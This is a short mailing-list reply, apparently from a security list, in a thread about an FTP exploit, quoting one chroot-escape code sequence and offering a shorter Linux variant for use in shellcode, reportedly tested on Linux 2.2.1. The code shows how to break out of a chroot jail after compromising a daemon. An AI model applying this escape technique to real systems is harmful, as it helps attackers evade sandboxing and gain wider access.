Re: another ftp exploit (fwd)

[artem () AM ALEXRADIO COM (Artem Malyshev)]

> /* To break chroot we have to...
>
>    fd = open ( ".", O_RDONLY );
>    mkdir ( "hax0r", 0666 );
>    chroot ( "hax0r" );
>    fchdir ( fd );
>    for ( i = 0; i < 254; i++ )
>        chdir ( ".." );
>    chroot ( "." );
>
> */

Too complex for standart linux
All we have to do to break chroot is:

 mkdir("/sh");   // we already have string "/sh" in memory as a part of
                 // "/bin/sh"
 chroot("/sh");
 chroot("../../../../../../../../../"); // a number of "../" here,
                                        // I used 0x10

Last string can be built is stack with a simple loop
Tested on linux 2.2.1

 -am